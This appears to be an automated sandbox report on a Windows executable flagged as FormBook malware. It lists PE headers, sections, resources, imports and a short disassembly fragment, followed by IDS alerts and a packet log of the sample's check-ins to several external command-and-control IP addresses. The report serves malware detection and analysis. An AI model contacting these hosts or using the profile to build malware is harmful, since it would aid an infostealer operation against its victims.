                                                      jmp dword ptr [00416654h+eax*4]
                                                      jmp dword ptr [00416750h+ecx*4]
                                                      nop
                                                      jmp dword ptr [004166D4h+ecx*4]
                                                      nop
                                                      inc cx
                                                      add byte ptr [eax-4BFFBE9Ah], dl
                                                      inc cx
                                                      add byte ptr [ebx], ah
                                                      ror dword ptr [edx-75F877FAh], 1
                                                      inc esi
                                                      add dword ptr [eax+468A0147h], ecx
                                                      add al, cl
                                                      jmp 00007F43CFA05567h
                                                      add esi, 03h
                                                      add edi, 03h
                                                      cmp ecx, 08h
                                                      jc 00007F43CD58CD2Eh
                                                      rep movsd
                                                      jmp dword ptr [00000000h+edx*4]

                                                      Rich Headers

                                                      Programming Language:
                                                      • [ C ] VS2010 SP1 build 40219
                                                      • [C++] VS2010 SP1 build 40219
                                                      • [ C ] VS2008 SP1 build 30729
                                                      • [IMP] VS2008 SP1 build 30729
                                                      • [ASM] VS2010 SP1 build 40219
                                                      • [RES] VS2010 SP1 build 40219
                                                      • [LNK] VS2010 SP1 build 40219

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                      RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                      RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                      RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                      RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                      RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                      RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                      RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                      RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                      RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                      RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                      RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                      RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                      RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                      RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                      RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                      RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                                      RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                                      RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                                      RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                                      RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                      RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                                      RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                                      RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                                      RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                                      RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                                      RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                      Imports

                                                      DLLImport
                                                      WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                      VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                      COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                      MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                      WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                      PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                      USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                      KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                      USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                      GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                      ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                      SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                      ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                      OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                                                      Possible Origin

                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishGreat Britain
                                                      EnglishUnited States

                                                      Network Behavior

                                                      Suricata IDS Alerts

                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2024-09-25T05:35:15.961696+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44978543.154.104.24780TCP
                                                      2024-09-25T05:36:00.465759+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4497373.33.130.19080TCP
                                                      2024-09-25T05:36:17.043790+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44973823.224.27.17380TCP
                                                      2024-09-25T05:36:19.561257+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44973923.224.27.17380TCP
                                                      2024-09-25T05:36:22.108096+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44974023.224.27.17380TCP
                                                      2024-09-25T05:36:24.659318+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44974123.224.27.17380TCP
                                                      2024-09-25T05:36:30.941997+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44974252.187.43.7380TCP
                                                      2024-09-25T05:36:33.485054+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44974352.187.43.7380TCP
                                                      2024-09-25T05:36:36.056953+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44974452.187.43.7380TCP
                                                      2024-09-25T05:36:38.622547+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44974552.187.43.7380TCP
                                                      2024-09-25T05:36:44.452768+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449746199.192.21.16980TCP
                                                      2024-09-25T05:36:46.967510+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449747199.192.21.16980TCP
                                                      2024-09-25T05:36:49.520697+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449748199.192.21.16980TCP
                                                      2024-09-25T05:36:52.085844+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449749199.192.21.16980TCP
                                                      2024-09-25T05:36:57.916189+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44975081.2.196.1980TCP
                                                      2024-09-25T05:37:00.549424+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44975181.2.196.1980TCP
                                                      2024-09-25T05:37:03.385479+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44975281.2.196.1980TCP
                                                      2024-09-25T05:37:05.872212+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44975381.2.196.1980TCP
                                                      2024-09-25T05:37:12.116304+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449754107.163.130.24980TCP
                                                      2024-09-25T05:37:14.687022+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449755107.163.130.24980TCP
                                                      2024-09-25T05:37:17.435891+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449756107.163.130.24980TCP
                                                      2024-09-25T05:37:19.986650+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449757107.163.130.24980TCP
                                                      2024-09-25T05:37:25.903194+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44975852.223.13.4180TCP
                                                      2024-09-25T05:37:28.431666+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44975952.223.13.4180TCP
                                                      2024-09-25T05:37:30.990421+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44976052.223.13.4180TCP
                                                      2024-09-25T05:37:33.539792+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44976152.223.13.4180TCP
                                                      2024-09-25T05:37:40.526290+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449762103.21.221.480TCP
                                                      2024-09-25T05:37:43.073042+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449763103.21.221.480TCP
                                                      2024-09-25T05:37:45.620235+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449764103.21.221.480TCP
                                                      2024-09-25T05:37:51.441510+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449765103.21.221.480TCP
                                                      2024-09-25T05:37:56.950912+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497663.33.130.19080TCP
                                                      2024-09-25T05:37:59.515904+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497673.33.130.19080TCP
                                                      2024-09-25T05:38:03.022847+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497683.33.130.19080TCP
                                                      2024-09-25T05:38:05.079431+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4497693.33.130.19080TCP
                                                      2024-09-25T05:38:10.578940+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497703.33.130.19080TCP
                                                      2024-09-25T05:38:14.182562+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497713.33.130.19080TCP
                                                      2024-09-25T05:38:15.694756+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497723.33.130.19080TCP
                                                      2024-09-25T05:38:18.215404+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4497733.33.130.19080TCP
                                                      2024-09-25T05:38:23.734924+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44977415.197.204.5680TCP
                                                      2024-09-25T05:38:26.296932+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44977515.197.204.5680TCP
                                                      2024-09-25T05:38:29.014612+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44977615.197.204.5680TCP
                                                      2024-09-25T05:38:31.546815+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44977715.197.204.5680TCP
                                                      2024-09-25T05:38:37.550175+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449778198.252.106.19180TCP
                                                      2024-09-25T05:38:40.238083+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449779198.252.106.19180TCP
                                                      2024-09-25T05:38:42.802640+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449780198.252.106.19180TCP
                                                      2024-09-25T05:38:45.355247+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449781198.252.106.19180TCP
                                                      2024-09-25T05:38:52.432549+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44978243.154.104.24780TCP
                                                      2024-09-25T05:38:54.979831+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44978343.154.104.24780TCP
                                                      2024-09-25T05:38:57.526325+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44978443.154.104.24780TCP

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Sep 25, 2024 05:35:59.937958956 CEST4973780192.168.2.43.33.130.190
                                                      Sep 25, 2024 05:35:59.942955017 CEST80497373.33.130.190192.168.2.4
                                                      Sep 25, 2024 05:35:59.943033934 CEST4973780192.168.2.43.33.130.190
                                                      Sep 25, 2024 05:35:59.952097893 CEST4973780192.168.2.43.33.130.190
                                                      Sep 25, 2024 05:35:59.956947088 CEST80497373.33.130.190192.168.2.4
                                                      Sep 25, 2024 05:36:00.465517044 CEST80497373.33.130.190192.168.2.4
                                                      Sep 25, 2024 05:36:00.465549946 CEST80497373.33.130.190192.168.2.4
                                                      Sep 25, 2024 05:36:00.465560913 CEST80497373.33.130.190192.168.2.4
                                                      Sep 25, 2024 05:36:00.465759039 CEST4973780192.168.2.43.33.130.190
                                                      Sep 25, 2024 05:36:00.468810081 CEST4973780192.168.2.43.33.130.190
                                                      Sep 25, 2024 05:36:00.473674059 CEST80497373.33.130.190192.168.2.4
                                                      Sep 25, 2024 05:36:16.390147924 CEST4973880192.168.2.423.224.27.173
                                                      Sep 25, 2024 05:36:16.395068884 CEST804973823.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:16.395169973 CEST4973880192.168.2.423.224.27.173
                                                      Sep 25, 2024 05:36:16.405566931 CEST4973880192.168.2.423.224.27.173
                                                      Sep 25, 2024 05:36:16.410478115 CEST804973823.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:17.043718100 CEST804973823.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:17.043790102 CEST4973880192.168.2.423.224.27.173
                                                      Sep 25, 2024 05:36:17.916901112 CEST4973880192.168.2.423.224.27.173
                                                      Sep 25, 2024 05:36:17.921829939 CEST804973823.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:18.941622019 CEST4973980192.168.2.423.224.27.173
                                                      Sep 25, 2024 05:36:18.946821928 CEST804973923.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:18.946928024 CEST4973980192.168.2.423.224.27.173
                                                      Sep 25, 2024 05:36:18.960832119 CEST4973980192.168.2.423.224.27.173
                                                      Sep 25, 2024 05:36:18.965745926 CEST804973923.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:19.561192989 CEST804973923.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:19.561256886 CEST4973980192.168.2.423.224.27.173
                                                      Sep 25, 2024 05:36:20.464016914 CEST4973980192.168.2.423.224.27.173
                                                      Sep 25, 2024 05:36:20.470741987 CEST804973923.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:21.482718945 CEST4974080192.168.2.423.224.27.173
                                                      Sep 25, 2024 05:36:21.487699032 CEST804974023.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:21.487905025 CEST4974080192.168.2.423.224.27.173
                                                      Sep 25, 2024 05:36:21.498716116 CEST4974080192.168.2.423.224.27.173
                                                      Sep 25, 2024 05:36:21.503662109 CEST804974023.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:21.503681898 CEST804974023.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:21.503690958 CEST804974023.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:21.503710032 CEST804974023.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:21.503720045 CEST804974023.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:21.503783941 CEST804974023.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:21.503861904 CEST804974023.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:21.503870010 CEST804974023.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:21.503879070 CEST804974023.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:22.107836962 CEST804974023.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:22.108095884 CEST4974080192.168.2.423.224.27.173
                                                      Sep 25, 2024 05:36:23.010560036 CEST4974080192.168.2.423.224.27.173
                                                      Sep 25, 2024 05:36:23.015522957 CEST804974023.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:24.029382944 CEST4974180192.168.2.423.224.27.173
                                                      Sep 25, 2024 05:36:24.034481049 CEST804974123.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:24.034611940 CEST4974180192.168.2.423.224.27.173
                                                      Sep 25, 2024 05:36:24.040805101 CEST4974180192.168.2.423.224.27.173
                                                      Sep 25, 2024 05:36:24.045840979 CEST804974123.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:24.658937931 CEST804974123.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:24.659317970 CEST4974180192.168.2.423.224.27.173
                                                      Sep 25, 2024 05:36:24.660213947 CEST4974180192.168.2.423.224.27.173
                                                      Sep 25, 2024 05:36:24.665941000 CEST804974123.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:29.855320930 CEST4974280192.168.2.452.187.43.73
                                                      Sep 25, 2024 05:36:29.860307932 CEST804974252.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:29.860626936 CEST4974280192.168.2.452.187.43.73
                                                      Sep 25, 2024 05:36:29.874146938 CEST4974280192.168.2.452.187.43.73
                                                      Sep 25, 2024 05:36:29.879192114 CEST804974252.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:30.941747904 CEST804974252.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:30.941907883 CEST804974252.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:30.941997051 CEST4974280192.168.2.452.187.43.73
                                                      Sep 25, 2024 05:36:31.385729074 CEST4974280192.168.2.452.187.43.73
                                                      Sep 25, 2024 05:36:32.411406040 CEST4974380192.168.2.452.187.43.73
                                                      Sep 25, 2024 05:36:32.416362047 CEST804974352.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:32.416649103 CEST4974380192.168.2.452.187.43.73
                                                      Sep 25, 2024 05:36:32.435300112 CEST4974380192.168.2.452.187.43.73
                                                      Sep 25, 2024 05:36:32.440129042 CEST804974352.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:33.484868050 CEST804974352.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:33.484965086 CEST804974352.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:33.485054016 CEST4974380192.168.2.452.187.43.73
                                                      Sep 25, 2024 05:36:33.948059082 CEST4974380192.168.2.452.187.43.73
                                                      Sep 25, 2024 05:36:34.966965914 CEST4974480192.168.2.452.187.43.73
                                                      Sep 25, 2024 05:36:34.971919060 CEST804974452.187.43.73192.168.2.4
